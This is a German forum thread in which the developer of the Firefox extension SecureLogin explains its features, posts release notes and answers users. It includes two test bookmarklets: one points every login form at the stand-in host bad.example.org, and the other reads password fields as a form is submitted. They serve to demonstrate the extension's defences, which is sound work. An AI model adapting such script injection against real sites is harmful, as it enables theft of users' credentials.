OK, habe es eben getestet:
Anscheinend kann man kein JavaScript-Code mehr in der Addressleiste ausführen, wenn die Erweiterung TabMixPlus installiert ist.
Du kannst die Tests aber auch mit aktiviertem TabMixPlus durchführen, in dem du den JavaScript-Test-Code als Bookmarklet abspeicherst.
Dazu einfach ein neues Lesezeichen erstellen und als Ort den JavaScript-Code eingeben.
Nach dem Laden der Login-Seite dann einfach das Bookmarklet aufrufen.
Zitat von ReVoxdamit SecureLogin überhaupt richtig funktioniert mußt Du Javascript aktiviert haben und den oben aufgeführten Script wie beschrieben eintragen und auch durch die Return/Enter Taste aufrufen
Du meinst wahrscheinlich, das für den Test JavaScript aktiviert sein muss.
Aber damit keine Missverständnisse aufkommen:
Damit die Erweiterung SecureLogin funktioniert, muss JavaScript nicht aktiviert sein!
(Mal abgesehen davon, das Firefox intern und für die Erweiterungen JavaScript genutzt wird, das hat aber mit der Option, für Webseiten JS zu deaktivieren nichts zu tun).
Ich glaube nicht, das TabMixPlus die Tests unterbindet. AdBlockPlus tut es jedenfalls nicht, das ist auch in der Liste meiner genutzten Erweiterungen.
Falls NoScript JavaScript für die Login-Seite deaktiviert, funktionieren die Tests natürlich nicht.
Der erste Test ändert den Wert des "action"-Attributs aller Formulare auf der geladenen Seite auf "http://bad.example.org" (eine Nicht-existierende Beispiel-Website).
Der zweite Test fügt allen Formularen der geladenen Seite einen EventHandler für das "submit"-Event hinzu und zeigt beim Abschicken des Formulars die Inhalte vorhandener Passwort-Felder in einem Warnungs-Fenster (alert).
Hier nochmal eine genauere Beschreibung zur Ausführung der Tests, speziell für dieses Forum:
- JavaScript für dieses Forum aktivieren
- Aus diesem Forum ausloggen
- http://www.firefox-browser.de/forum/ aufrufen
- In die Adresszeile einen der Test-JavaScript-Codes eingeben und die "Enter/Return"-Taste drücken, noch während der Fokus in der Adresszeile liegt, oder alternativ auf das grüne Dreieck klicken (im Falle des Standard-Themes von Firefox 2)
- Im Falle des ersten Tests, einfach per SecureLogin einloggen (Klick auf Toolbar oder Statusbar Icon oder ALT+N)
- Im Falle des zweiten Tests, einmal ohne und einmal mit aktivierter Option "JavaScript-Schutz beim einloggen aktivieren" per SecureLogin einloggen
Falls ihr jemanden vom Firefox Passwort-Manager + SecureLogin überzeugen wollt, die Tests funktionieren natürlich auch, falls man die Login-Daten manuell eingibt.
SecureLogin kann also als zusätzlicher Phishing-Schutz angesehen werden.
Denn sogar falls man auf einer böswilligen Website landet, die wie die Original-Seite aussieht, kann man sich dort nicht versehentlich einloggen, da ja für diese Seite keine Passwörter hinterlegt sind.
Nicht schützen kann SecureLogin allerdings davor, wenn es ein Angreifer schaffen sollte, die DNS-Namensauflösung auf sich umzubiegen. Das geht allerdings schon weit über Cross-site scripting hinaus und dafür müsste ein Angreifer schon gezielter vorgehen, z.B. in dem er euren Router übernimmt oder euren DNS-Server oder euren Rechner. Dann habt ihr allerdings sowieso ein Problem. 
Als Phishing-Schutz empfehle ich euch ansonsten OpenDNS, das auch als DNS-Server oft eine bessere Figur macht als die DNS-Server der DSL-Provider.
Und falls sich jetzt noch jemand fragt, wie überhaupt fremder JavaScript-Code auf eine vertrauenswürdige Seite gelangen kann, dem empfehle ich folgende Links:
http://www.google.de/search?q=site%…-site+scripting
Cross-site scripting
Und gleich noch ein Test:
Diesmal zur Demonstration des "JavaScript-Schutz beim Einloggen".
Dazu könnt ihr wiederum den folgenden JavaScript-Code in die Adresszeile eingeben und ausführen, nachdem ihr eine beliebige Login-Seite geladen habt, für die ihr im Passwort-Manager Login-Daten hinterlegt habt:
javascript:(function(){for(var i=0;i<document.forms.length;i++){document.forms[i].addEventListener('submit',function(event){for(var j=0;j<event.currentTarget.elements.length;j++){if(event.currentTarget.elements[j].type=='password')alert('Password: '+event.currentTarget.elements[j].value);}},false);}})();
Ohne aktivierten Schutz wird euer Passwort beim Einloggen in einer Warnmeldung präsentiert.
Mit aktiviertem Schutz passiert das nicht.
Daher empfiehlt es sich, den Schutz zu aktivieren und Seiten, die damit nicht funktionieren in die Liste der Ausnahmen aufzunehmen.
Wenn ihr folgenden JavaScript-Code in die Adresszeile eingebt, nachdem ihr eine beliebige Login-Seite geladen habt, für die ihr Login-Daten hinterlegt habt, könnt ihr eine der Schutzmechanismen der SecureLogin-Erweiterung testen:
javascript:(function(){for(var i=0;i<document.forms.length;i++){document.forms[i].action='http://bad.example.org';}})();
Secure Login wird euch beim Login nachfragen, ob ihr euch wirklich auf bad.example.org einloggen wollt und ihr könnt den Login-Vorgang abbrechen, ohne das eure Anmeldedaten an bad.example.org übertragen werden.
Die geänderte Login-URL zeigt euch im übrigen auch der Tooltip der Icons an.
ReVox: Bug bestätigt und in der Version 0.5.2 beseitigt.
Ich hatte diesen Fehler nicht bemerkt, da ich unter Xubuntu (Linux) entwickle und der Fehler dort nicht auftrat.
Ganz so plattformunabhängig ist das Extension Development wohl doch nicht. 
Ich würde euch übrigens raten, als Student nicht in der Prüfungszeit mit dem Extension Development anzufangen, das drückt den Notenschnitt.
@all: Dankeschön. Lob und Verbesserungsvorschläge höre ich immer gerne. 
Konnte die Kompatibilitäts-Probleme mit der Erweiterung ConQuery bestätigen.
Sie sind in der neuen Version 0.5.1 behoben.
Es lag daran, das ich das JavaScript Prototype "Array" mit der (fehlenden, aber oftmals gebrauchten) Methode "inArray" erweitert hatte und ConQuery damit nicht klar kam.
Mir war nicht bewusst, das die Prototype-Erweiterung auch außerhalb meiner Extension Einfluss nehmen würde - in Zukunft werde ich das berücksichtigen und nur meinen eigenen Objekten und Prototypen Methoden hinzufügen.
Seit Version 0.5 gibt es auch ein erweitertes Kontext-Menü (Rechtsklick auf das Secure Login Icon), das neben dem Zugriff auf verschiedene SecureLogin-Einstellungen auch einen schnellen Zugriff auf die gespeicherten Passwörter und die Ausnahmen-Liste des Firefox Passwort-Manager bietet.
Das Auto-Update gibt's erst seit Version 0.4.1, daher werden vorherige Versionen leider nicht automatisch aktualisiert.
Seit heute gibt es das neue Release 0.5.
Probier mal die neueste Version und gib mir Bescheid, ob die Fehlermeldung dann auch noch kommt.
In Version 0.5 gibt es ein paar neue Features:
- Warnung, falls dies Second Level Domain beim Login gewechselt wird
- Ausnahmen-Liste für Websites, bei denen der "JavaScript Schutz beim Login" nicht funktioniert
Zur Option "Java-Script-Schutz beim Einloggen aktivieren":
Sie basiert darauf, das die Werte bestimmter Eingabefelder des Loginformulars (Checkboxes, Radio buttons, Auswahllisten), sowie die Werte der versteckten Felder (input type="hidden") ausgelesen werden und zusammen mit den Login-Daten direkt an die Login-Seite gesendet wird, die im "action" Attribut des Formulars vermerkt ist.
Im Prinzip das, was Firefox auch macht, wenn ein Formular abgeschickt wird. Allerdings ohne jemals die Login-Daten in die Formular-Felder einzutragen und ohne das eigentlich Formular abzuschicken (ohne "submit").
Um sicherzugehen, das man sich auf der richtigen Webseite einloggt, muss man allerdings auch das Ziel des Logins überprüfen, das z.B. im Tooltip der SecureLogin icons angezeigt wird.
Login-Formulare, die JavaScript-Routinen für den Login-Vorgang benötigen (onsubmit, etc.) funktionieren daher mit dieser Option nicht.
Auch kann es sein, das bei HTML-Suppe nicht alle Felder, z.B. Submit-Buttons mit type="image" eingelesen werden.
Eventuell kann es auch Kodierungsprobleme geben.
Die Option funktioniert also leider nicht mit allen Anmeldeformularen.
Erfolgreich getestet habe ich sie z.B. mit
- phpBB-Foren wie diesem,
- Confixx (Webhosting-Konfigurations-Frontend)
- Media-Wiki (Wiki-Software für Seiten wie Wikipedia)
Nicht funktioniert hat aber z.B. die Anmeldung mit aktivierter Option bei
- studiVZ
- WordPress
Ohne aktivierte Option funktioniert die Anmeldung auch bei diesen Seiten.
Die Option ist jedoch auch nicht nötig.
Der normale Login-Vorgang ist mit SecureLogin schon sicherer als die Default-Einstellung des Firefox-Passwort-Manager, Benutzer und Passwort automatisch in alle Formulare der gleichen Domain einzutragen.
Zu Lasten der Schnelligkeit geht die Option nicht.
Nicht zwei mal der gleiche Eintrag, sondern zwei mal "em:updateURL" statt "em", einmal zum öffnen des Tags, einmal zum schließen des Tags.
Zur besseren Erklärung:
Genau so wie auf http://developer.mozilla.org/en/docs/install.rdf#updateURL unter Examples beschrieben, nur mit der von mir angegebenen URL
https://blueimp.net/mozilla/update.rdf?itemid=%ITEM_ID%&itemversion=%ITEM_VERSION%&appid=%APP_ID%&appversion=%APP_VERSION%&appos=%APP_OS%
Alternativ kann man auch einfach die neue Version 0.4.1 installieren, da ist die updateURL schon integriert.
Antarex:
Gleich vorneweg: Der JavaScript-Schutz ist nicht nötig.
Auch ohne diese Option ist der Login mit SecureLogin sicherer als mit der Standardeinstellung von Firefox, gespeicherte Passwörter automatisch auszufüllen.
Wenn es allerdings jemand schaffen sollte, euch durch einen manipulierten Link oder eine andere Möglichkeit JavaScript-Code für diese Seite unterzujubeln, könnte er die Anmelde-Daten kurz vor dem Login abgreifen, da sie (ohne die JavaScript-Schutz-Option) vor dem Abschicken des Formulars eingetragen werden.
Falls ihr die Anmeldeseite über eure Lesezeichen besucht oder sie manuell eingebt, kann euch das aber eigentlich nicht passieren.
Mit der Option "JavaScript Schutz beim einloggen aktivieren" werden eure Anmeldedaten gar nicht erst in die Formularfelder eingetragen, sondern direkt an die Anmeldeseite geschickt, mit Hilfe interner Firefox-Funktionen und ohne das Login-Formular. Da ihr über die Tooltips der SecureLogin-Icons das Ziel der Anmeldung überprüfen könnt, seit ihr dadurch sogar vor sogenanntem client-seitigem Cross-Site-Scripting-Attacken geschützt.
Miccovin und Sommerrain:
Der Sinn der Erweiterung SecureLogin ist es, den Passwort-Manager von Firefox zu erweitern und zwar im Sinne von Sicherheit+Komfort.
Wenn du den Passwort-Manager also nicht nutzt, um deine Passwörter zu speichern, dann kannst du logischerweise auch mit dieser Erweiterung nichts anfangen.
Wenn du allerdings den integrierten Passwort-Manager nutzt, dann werden in der Standardeinstellung (signon.prefillForms = true) auf jedem Login-Formular der zugehörigen Domain automatisch Benutzer und Passwort in die Formular-Felder eingetragen.
Warum das ein Sicherheitsrisiko darstellt, habe ich in vorhergehenden Beiträgen erläutert, hier nochmal der Link zur heise-News:
Passwort-Manager von Firefox erleichtert Phishern die Arbeit
Diese Sicherheitslücke beseitigt SecureLogin, in dem der Konfigurations-Wert signon.prefillForms auf false gesetzt wird (so lange SecureLogin aktiviert ist) und somit keine Login-Daten mehr automatisch ausgefüllt werden.
Und da SecureLogin, wie der Name schon sagt, eine "Login-Erweiterung" ist, brauchst du sie nur im Moment des Einloggens, nicht wenn du schon durch gespeicherte Session-Daten im Cookie eingeloggt bist.
Der Passwort-Manager selbst ist schon eine Komfort-Bereicherung, da man sich nicht die Zugangsdaten für verschiedene Seiten merken muss, sondern nur das Master-Passwort. Ein Master-Passwort zu verwenden empfiehlt sich, damit die Login-Daten verschlüsselt gespeichert werden können.
Das Speichern der Zugangsdaten im Passwort-Manager kann zudem auch einen Sicherheitsgewinn darstellen. Denn auf diese Weise kann man komplett kryptische Kombinationen als Passwort verwenden, die man sich sonst nicht auswendig merken könnte.
Den Komfort des Passwort-Managers erweitert SecureLogin noch einmal, in dem man sich per Tastatur-Kombination (ALT+N) oder per Klick auf Toolbar oder Statusbar Icon einloggen kann.
Bei mehreren Benutzern für ein Login-Formular wird eine Dialog-Box zur Auswahl präsentiert.
Der Sicherheitsgewinn durch SecureLogin wird dadurch erreicht, das eine Benutzeraktion nötig ist um die Login-Daten einzutragen, ohne das ein Komfortverlust eintritt.
Cheffi:
Wow, gleich am Profi-Unix-Werkzeug versucht. Vim verwende ich selbst eigentlich nur ganz selten.
Eigentlich ist diese manuelle Änderung auch nicht unbedingt notwendig. Denn die einzige Änderung der Version 0.4.1 zur Version 0.4 ist, das sie eben diese updateURL mitbringt. Aber so könnt ihr immerhin die Funktionalität sicherstellen. Vielen Dank!
Ich habe jetzt doch eine "Custom Update URL" hinzugefügt, da es wohl noch eine Weile dauert, bis SecureLogin auf addons.mozilla.org gelistet ist.
Somit kann SecureLogin ab sofort automatisch aktualisiert werden.
Dazu müsst ihr folgendes tun:
Firefox beenden.
Öffnet folgenden Ordner:
--> [EUER PROFILVERZEICHNIS]/extensions/secureLogin@blueimp.net/
Darin öffnet ihr die Datei "install.rdf" mit einem Texteditor, der UNIX-Zeilenumbrüche (\n) versteht.
Dort fügt ihr direkt hinter der "optionsURL" folgende Zeile ein:
<em>https://blueimp.net/mozilla/update.rdf?itemid=%ITEM_ID%&itemversion=%ITEM_VERSION%&appid=%APP_ID%&appversion=%APP_VERSION%&appos=%APP_OS%</em>
Wichtig: Statt "em" müsst ihr als Tags "em:updateURL" verwenden. Leider verschluckt phpBB diese Tags sonst hätte ich sie direkt mit hinein geschrieben.
Zur besseren Erklärung:
Der Eintrag muss genau so wie auf http://developer.mozilla.org/en/docs/install.rdf#updateURL unter Examples beschrieben aussehen, nur mit der von mir angegebenen URL
https://blueimp.net/mozilla/update.rdf?itemid=%ITEM_ID%&itemversion=%ITEM_VERSION%&appid=%APP_ID%&appversion=%APP_VERSION%&appos=%APP_OS%
Nach einem Firefox-Neustart sollte euch das Update zur Version 0.4.1 angezeigt werden.
Alternativ kann man auch einfach die neue Version 0.4.1 manuell installieren, da ist die updateURL schon integriert.
Hast du es schon mal mit einem frischen Profil versucht?
Das ist immer die erste Anlaufstelle um Probleme aufzuspüren.
Ohne weitere Informationen kann ich dir leider nicht helfen.
hyper_ch:
Wenn du die Daten manuell eingibst und auf Login klickst, hat die SecureLogin Extension überhaupt nichts damit zu tun. Daran kann es also leider nicht liegen.
SecureLogin ändert nichts daran, wann du eingeloggt wirst, wie lange du eingeloggt wirst oder auf welchen Seiten du eingeloggt wirst.
Die SecureLogin-Extension ändert nichts an der Cookie-Behandlung, den gespeicherten Cookies oder einer anderen Session-Routine.
Das einzige was SecureLogin ändert, ist WIE du dich einloggst.
Die gespeicherten Login-Daten werden allein von Firefox integrierter Passwort-Verwaltung verwaltet.
Deswegen bietet SecureLogin auch keine Dialog-Box zur Verwaltung dieser Passwörter, da es diese schon integriert in Firefox gibt.
Ich habe mir zum komfortablen Zugang einen Toolbarbutton eingerichtet, der mich direkt zu den Einstellungen bringt.
Panther999:
Ich habe SecureLogin eben mit der inFormEnter Erweiterung zusammen getestet. Bei mir gab es keine Probleme. Vielleicht ist es aber auch eine Betriebssystem-spezifische Sache (Xubuntu Linux hier).
Andererseits wüsste ich nicht, warum die Erweiterungen nicht koexistieren sollten.
hyper_ch:
Die Möglichkeit, bestehende Logins zu löschen, gibt es schon.
Da SecureLogin zum speichern der Passwörter auf Firefox integrierten Passwort-Manager setzt, findest du diese unter
--> Einstellungen --> Sicherheit --> Passwörter anzeigen
Panther999:
Wer mir Informationen zur Verbesserung liefert, nervt sicher nicht.
Die Fehlermeldung ist nicht normal.
Allerdings kann ich sie nicht reproduzieren und daher den Fehler nicht beheben.
Könntest du zum Test die Erweiterung in einem frischen Profil installieren?
Die Option "Java Script Schutz beim einloggen aktivieren" wird leider nicht bei allen Login-Formularen funktionieren.
Sie basiert darauf, das die Werte der Eingabefelder des Loginformulars (Checkboxes, Radio buttons, Auswahllisten), sowie die Werte der versteckten Felder ausgelesen werden und zusammen mit den Login-Daten direkt an die Login-Seite gesendet werden.
Login-Formulare, die JavaScript-Routinen für den Login-Vorgang verwenden (onsubmit, etc.) funktionieren daher mit dieser Option nicht.
Auch kann es sein, das bei HTML-Suppe nicht alle Felder, z.B. Submit-Buttons mit type="image" eingelesen werden.
Eventuell kann es auch Kodierungsprobleme geben.
Die Option befindet sich insgesamt also noch in der Testphase.
Sie ist jedoch auch nicht nötig. Der normale Login-Vorgang ist mit SecureLogin schon sicherer als die Default-Einstellung von Firefox, Benutzer und Passwort einfach in alle Formulare der gleichen Domain einzutragen.
Cheffi und Gen. Bully:
Die Update-Prüfung funktioniert leider nur, wenn die Erweiterung bei addons.mozilla.org gelistet ist.
Ich hatte zwar schon Version 0.1 der SecureLogin Extension über das "Developer Control Panel" (https://addons.mozilla.org/developers/) eingereicht, allerdings ja immer neue Versionen nachgeschoben.
Leider haben die Prüfer dort ziemlich viel zu tun:
Approval Queue Status: There are currently 298 add-ons awaiting review
(Das ist auch der Grund, warum neue Versionen immer erst später dort gelistet sind).
Deswegen dauert es wohl noch eine Weile, bis SecureLogin überprüft, akzeptiert und gelistet wird.
Damit das mal passiert, werde ich versuchen, die aktuelle Version eine Weile beizubehalten. Eigentlich hat sie jetzt auch alle Features, die mir so in den Sinn kamen (Komfort + Sicherheit + Information).
Thanks to Malte Kraus who pointed out that the JavaScript code protection could be circumvented using the addEventListener methods.
As long as Firefox doesn't implement DOM Level 3 there is no EventListenerList attribute to enumerate the registered listeners for a given object.
Therefore JavaScript code protection has been rewritten and a new version has been released, including a minor bugfix:
Version 0.4
Bugfix:
- Login forms using input type="image" do work now.New features:
- Rewritten JavaScript code protection.Note:
The JavaScript code protection might not work with every login. There might be character encoding issues, as the data is sent manually using internal Firefox methods. This needs more testing but isn't that high on the priority list as the SecureLogin extension works as it is. The extra protection is good to have but will most likely not work with pages using JavaScript to submit the form data as well.I thought about enabling Frames support for SecureLogin, but gave the idea up. This would mean to parse every single frame for forms, user+pass fields and according saved login data as Firefox doesn't save this information.
Most login pages don't need frames and those without can be considered more secure, too.
http://forums.mozillazine.org/viewtopic.php?p=2741950#2741950
Das Problem mit http://www.consors.de habe ich eben gelöst.
Es lag daran, das bei dieser Seite ein "Klick" auf ein input-Element vom Typ "image" nötig ist, um sich erfolgreich einzuloggen.
Danke für die Info. Der Fix war wahrscheinlich auch für manche andere Login-Seiten nötig, welche die Information auswerten, ob ein Image-Input-Button gedrückt wurde.
Ich habe das Update allerdings noch nicht hochgeladen, da ich noch an einem zweiten Problem arbeite, das auch http://www.ogame.de betrifft:
Meine Extension funktioniert derzeit noch nicht mit Login-Seiten, die sich innerhalb von Frames befinden.
Ich freu mich natürlich über Hinweise zur Verbesserung der Extension. Es wäre allerdings besser, wenn ihr Hinweise in den zugehörigen Thread schreiben würdet, denn den habe ich "abboniert" und werde über neue Beiträge per E-mail benachrichtigt:
Nein, das geht leider nicht.
Das Problem ist, das Firefox Passwort Manager als Login-Informationen nur Benutzer, Passwort und Domain speichert, nicht mehr.
Das heißt, ich kann nicht feststellen ob der Benutzer wünscht, das diese Checkbox markiert wird oder nicht.
Wenn SecureLogin jetzt diese (oder eine andere Checkbox) jedesmal aktiviert nehme ich dem User die Möglichkeit, die Checkbox nicht zu aktivieren.
Ich könnte zwar speziell für die phpBB-Checkbox eine Option einbauen, diese zu markieren, die über die SecureLogin Einstellungen abschaltbar wäre. Das würde dann aber nur bei phpBB-Foren funktionieren. Andere Foren und andere Login-Webseiten haben wieder eine andere Formular-Struktur. So gibt es z.B. Seiten, bei denen man erst über eine Drop-Down-Box über zusätzliche Login-Informationen entscheidet.
Es gibt einfach zu viele Möglichkeiten die sich bei jeder Webseite unterscheiden können.
Sobald sich Firefox die gesamte Formular-Struktur merkt, kann ich all diese Optionen berücksichtigen. Das Problem liegt also eher am Passwort-Manager von Firefox, der sich zuwenig Informationen merkt.
Es bleibt dir also nicht anderes übrig, als die Checkbox manuell zu markieren und dich dann mit ALT+N oder einem Klick auf Toolbar button oder Statusbar Icon einzuloggen.
Wie schon geschrieben gibt es eigentlich schon eine gute Extension für die Verwaltung der Formular Daten:
Form History Manager
Da der Autor schreibt, das er die Extension für Firefox 2 nicht aktualisieren kann, weil die nötigen API's entfernt wurden, hab' ich mir das mal selber angeschaut.
Und es ist tatsächlich so, das die Firefox Entwickler hier einen Fehler gemacht haben:
Das Problem ist, das sie in Firefox 2 schon Places integrieren wollten, es dann aber nicht getan haben. Mit Places wäre der Zugriff über andere API's verlaufen (Datenbank-Zugriffe). Aus irgend einem Grund haben sie aber schon API's für den ursprünglichen Zugriff auf Formular-Daten in Firefox 2 entfernt. So gibt es z.B. kein Property (Eigenschaft) "rowCount" mehr, um auf die Anzahl der Einträge zuzugreifen.
D.h. in dem Fall hilft wirklich nichts anderes, als darauf zu warten das die Firefox Entwickler entweder die alten API's wieder einbauen oder Firefox 3 rauskommt.
Das verhalten, das du da beschreibst, hat nichts mit der SecureLogin Extension zu tun. Secure Login ändert nur ein einziges Verhalten des Mozilla Firefox:
Es verhindert das automatische Ausfüllen der Formularfelder mit Benutzername und Passwort. Das macht es, in dem der Konfigurations-Wert signon.prefillForms auf false gesetzt wird, solange SecureLogin aktiv ist.
Dadurch können diese Daten nicht mehr einfach durch Cross-Site-Scripting-Attacken geklaut werden.
Du kannst mit SecureLogin zusätzlich noch alle JavaScript-Event-Handler beim Login deaktivieren, als zusätzliche Vorsichtsmaßnahme. Dieses Verhalten ist aber optional.
Um dich trotzdem komfortabel mit den im Passwort-Manager von Firefox hinterlegten Login-Daten einloggen zu können, bietet SecureLogin drei Möglichkeiten:
1. Klick auf den Toolbarbutton (den kannst du hinzufügen, in dem du mit Rechts-klick auf die Toolbar klickst, "Anpassen" wählst und ihn per Drag+Drop auf die Toolbar "fallen lässt".)
2. Klick auf das Statusbar Icon
3. Betätigen des Tastaturkürzels ALT+N
SecureLogin ändert nichts daran, wann du eingeloggt wirst, wie lange du eingeloggt wirst oder auf welchen Seiten du eingeloggt wirst.
Die SecureLogin-Extension ändert nichts an der Cookie-Behandlung, den gespeicherten Cookies oder einer anderen Session-Routine.
Das einzige was SecureLogin ändert, ist WIE du dich einloggst.
Und das WIE ist mit SecureLogin sicherer und meiner Meinung nach auch komfortabler.
SecureLogin orientiert sich im Komfort an dem Feature "Opera Wand" (Opera Zauberstab) des Browsers Opera.
Sicherheitstechnisch bietet SecureLogin mit der Option "JavaScript Event Handler vor dem Login deaktivieren" sogar noch mehr als "Opera Wand".
Und das automatische Ausfüllen der Login-Daten war ein sicherheitstechnischer Nachteil von Mozilla Firefox. Warum das so ist erklärt z.B. eine heise Newsmeldung:
Passwort-Manager von Firefox erleichtert Phishern die Arbeit
Das du bei manchen Foren bei einem erneuten Besuch automatisch eingeloggt bist, liegt daran, das du für diese Seiten Cookies hinterlegt hast, deren Session noch gültig ist.
Das "Ausloggen" aus diesen Foren beendet die Session.
Und je nach Einstellungen der Seite werden Cookies automatisch ungültig, wenn du z.B. deine Browsersitzung beendest, den Browser also neustartest.
Bei manchen Foren wie z.B. diesem hier, das mit der Foren-Software phpBB läuft, kann man mit Hilfe einer Checkbox neben den Login-Feldern die Option " Bei jedem Besuch automatisch einloggen" setzen. Damit wird die Gültigkeit der Session-Cookies praktisch auf unendlich gesetzt und du bist auch nach einem Browser-Neustart bei einem erneuten Besuch des Forums automatisch eingeloggt.
Version 0.3.1 released:
Bugfix:
Keyboard shortcut was set to all ALT+key combinations by accident. It is now only ALT+N.New Feature:
Shows the keyboard shortcut (ALT+N) in tooltip.
http://forums.mozillazine.org/viewtopic.php?p=2740553#2740553